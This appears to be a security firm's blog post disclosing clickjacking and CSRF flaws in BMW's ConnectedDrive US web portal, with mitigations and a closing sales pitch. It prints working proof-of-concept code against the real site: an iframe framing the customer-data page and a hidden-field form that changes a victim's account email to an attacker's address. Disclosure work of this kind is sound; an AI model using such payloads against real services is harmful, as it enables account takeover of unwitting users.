BMW Vulnerabilities – Hijack Cars ConnectedDrive™ Service!
Let me tell you the story about some typical vulnerabilities that was discovered by @Seekurity Team in BMW ConnectedDrive service which will allow any beginner attacker to hijack the whole service!
First what is BMW ConnectedDrive service?
BMW ConnectedDrive – a technology packet full of services and apps that connects you closely to the world around you. It makes tasks easier and quicker to perform, giving you more time for what’s really important: your family, friends and free time.
A screenshot from BMW ConnectedDrive page shows some capabilities about the service:
Also here’s a video demonstrate the service nature and how it works:
Regarding the discovered vulnerabilities:
No web application is immune against at least a one or two typical vulnerability, The vulnerabilities we have discovered are able to give the attackers the ability to hijack the service, Change credentials, and many more!
Clickjacking, also known as a “UI redress attack”, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is “hijacking” clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.
Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.
More Details About clickjacking:
Because of no frame busting techniques or X-Frame-Options header, the whole website is vulnerable to Clickjacking attacks which could lead to a full account takeover considering such scenario:
1. Attacker will iframe any sensitive the website page and adjust the iframe size and add a “divs” as a layers on the unwanted-to-show parts of the original web page to fool and trick the user.
2. User get tricked by the crafted page and followed the attacker’s instruction to do a specific clicks to the iframed page
3. Unwanted actions happened in the logged in user’s session in result to the attack’s clicks.
BMW ConnectedDrive ClickJacking Issue to Takeover the service!<br>
<iframe src=”https://connecteddrive.bmwusa.com/cdp/release/internet/servlet/customerData” width=500 height=500></iframe></br>
1- Add an X-Frame-Options HTTP Header and set it’s value to “Deny” or “Sameorigin” as you can see it suitable to mitigate such attacks.
2- Use iframe busting techniques.
2. Cross Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
<title>BMW ConnectedDrive CSRF Vulnerability</title>
<h2>BMW ConnectedDrive CSRF Vulnerability – Hijack users cars ConnectedDrive service by @Seekurity!</h2>
<form action=”https://connecteddrive.bmwusa.com/cdp/release/internet/servlet/customerData” method=”POST”>
<input type=”hidden” name=”action” value=”changeUsername” />
<input type=”hidden” name=”greeting” value=”MR” />
<input type=”hidden” name=”firstname” value=”Hijacked” />
<input type=”hidden” name=”lastname” value=”Car” />
<input type=”hidden” name=”firstname1″ value=”Hijacked” />
<input type=”hidden” name=”lastname1″ value=”Car” />
<input type=”hidden” name=”firstname2″ value=”” />
<input type=”hidden” name=”lastname2″ value=”” />
<input type=”hidden” name=”middlename” value=”” />
<input type=”hidden” name=”genderRadio” value=”MR” />
<input type=”hidden” name=”nationalitySupport” value=”Standard” />
<input type=”hidden” name=”notification” value=”” />
<input type=”hidden” name=”languageinternet” value=”” />
<input type=”hidden” name=”accountType” value=”UNDEFINED” />
<input type=”hidden” name=”newmail1″ value=”Attacker_Email@gmail.com” />
<input type=”hidden” name=”newmail2″ value=”Attacker_Email@gmail.com” />
<input type=”submit” value=”Hijack Me!” />
1- Adding an Anti-CSRF random value along with the sent requests will properly mitigate the issue.
Vulnerabilities Proof of Concept Video:
Building a website? Or already built a one? Think twice before going public and let us protect your business!